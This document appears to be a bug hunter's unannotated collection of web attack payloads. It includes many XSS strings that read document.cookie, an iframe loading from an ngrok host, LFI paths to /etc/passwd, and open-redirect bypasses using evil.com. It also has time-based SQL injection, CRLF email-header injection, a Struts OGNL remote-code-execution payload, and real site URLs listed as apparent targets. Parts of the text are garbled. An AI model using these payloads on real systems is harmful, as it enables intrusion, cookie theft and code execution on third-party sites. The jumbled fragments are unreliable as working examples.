
create password directly url

<img src="http://evanricafort.com/profile.png">

https://awsr.com.au/wp-content/plugins/awsr-manager/?MD

https://marlcoatings.co.uk/__MACOSX/app/code/core/Mage/Admin/sql/

">'><details/open/ontoggle=confirm('XSS')>

<</p>iframe src=javascript:alert()//
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<a href="javascript&#x3ax=1;alert(1)">click
"&#58", "&#x3ax=1;"
</script><script>prompt(document.domain)</script>
<style/><img src="z'z</style><script/z>alert(1)</script>">

<svg/OnLoad="`${prompt``}`">
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
<p>He bugs<i>The hacker</i>,hack.</p>
</script><!--><svg onload=[document.domain].find%26%2340;alert%26rpar;>

</script><!--><svg onload=["_Y000!_"].find%26%2340;alert%26rpar;>
? "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain)
//># ?

<iframe src="http://evanricafort.com/profile.png"></iframe>
<sVg/oNloAd=�JaVaScRiPt:/**\/*\�/�\
eval(atob(�Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==�))�> <iframe
src=jaVaScrIpT:eval(atob(�Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==�))>

<font color="red">Bugs</font>
abcabc\"><svg/onload=confirm(1)>
x"autofocus/onfocus=lert(/O/)+"
javascript:prompt(document.cookie);//
<svg onload=confirm(document.domain)>
<imsofake%20onpointerrawupdate=window[%27alert%27](0)>xss
<</div>script</div>>alert()<</div>/script</div>>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>


sdf<script>alert(12)</script>
<script> src="{https)://server.com/xss.js">
<iframe <><a href=javascript&colon;alert(document.cookie)>Click
Here</a>=&gt;&lt;/iframe&gt;
LFI - Accept: ../../../../../../../../../etc/passwd{{
GET /root:x:0:0:root:/root:/bin/bash
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.domain);%3C/SCRIPT%3E

javascript:alert(document.cookie)//

">'><details/open/ontoggle=confirm('XSS')>
-alert(1)//\

''-prompt`1`-'',
''-confirm`1`-'',
<math><xxlink:href=javascript:confirm`1`>click
"oncut="alert()
1st Injection: */</script><!--
2nd Injection: */.domain)/*xxx
3rd Injection:*/(document/*xx
4th Injection: */prompt/*xxxxx
5th Injection: "><script>/*xss
sac-bugc

ssrf

"><img src="xasdasdasd" onerror="document.write('<iframe


src=http://fa5df2f7.ngrok.io></iframe>')" />
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
http://web.archive.org/cdx/search/cdx?url=*.domain/
*&output=json&fl=original&collapse=urlkey&page=

'"<svg/onload=prompt(5);>((7*7}}
<svg onload="alert(1)" <=''' svg='''
<Svg='''' onload=''''
%E5%98%8A%E5%98%8DSet-Cookie:%20test
�onmouseover=alert(document.domain)�

?t=test'*self['alert'](document['domain'])*'test
onerror=eval;throw'=alert\x28document\x2edomain\x29';
[Click Me](javascript:alert('xss'))
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

"><img src=x onerror=prompt(document.cookie);>


<script>window.location='https://www.google.com'</script>
<IFRAME src="http://www.cnn.com"></IFRAME>
<script>alert(document.cookies)</script>

<svg onload="alert(document.cookies)">
"'<svg/onload=prompt(document.cookie);>

<ScRipT>AlErT("hello");</script>

"></script><ScRipT>AlErT("hello");</script>
<input type="text" name="state" value="INPUT_FROM_USER">
<IFRAME src=javasript:alert("hackingmonks");"></IFRAME>

<IFRAME src=");"></IFRAME>

"><img src=x onerror=prompt``>


<img src=xss onerror=alert(1)>
<svg onload=alert(hi)>

https://business.pinterest.com/en/agencies/client-submission?
utm_source=business_pinterest&utm_medium=agencies_landing&utm_campaign=propel

https://help.pinterest.com/en/landing/request-a-feature?
utm_source=pinterest&utm_medium=settings&utm_campaign=request_a_feature_exp

https://www.pinterestcareers.com/jobs/account-manager-field-sales-tech-telco-new-
york-united-states
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
abc`;return+false});});alert`xss`;</script>
////google%E3%80%82com
//google.com?
///www.x.com@evil.com/
http:evil.com
//.@.@google.com
/\youtube.com
//2130706433
//0x7f000001
//3627732462
//1113625217
//google
//google@google.com
Http:3627732462
http:http:evil[.]com
http:/evil%252ecom
///www.x.com@evil.com
/%0D/google.com
java%0a%0ascript%0d%0d:alert(0)
%0d%0ahttp://google.com
%257B%257B7*7%257D%257D

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'
referer- '+(select*from(select(sleep(10}}}a)+'

privilege escalation-
first_name=hacker&last_name=hacker&location=�&tags=�&custom_field_values=�&email=sa
met%40wearehackerone.com&license_type=licensed
&billability_target=1337&billrate=1337

/_clockwork

root@kali:~/ParamSpider# python3 paramspider.py --domain https://electroneum.com

{"email":["victim@gmail.com","attacker@gmail.com"],"token":"some random token"}

Intercept the request and set email to: victim mail%0d%0acc:hacker mail id. The server
then sends the email with the attacker's address in CC.

Rce-

redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{�


ifconfig�})).start(),#b=#a.getInputStream(),#c=new
java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new
char[50000],#d.read(#e),#matt=#context.get(�com.opensymphony.xwork2.dispatcher.Http
ServletResponse�),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.get
Writer().close()}

PleaseSubscribe@gmail.com%0d%0aCC%3sachin272516@gmail.com%0d%0aszh%3a
https://education.23andme.com/wp-includes/wlwmanifest.xml
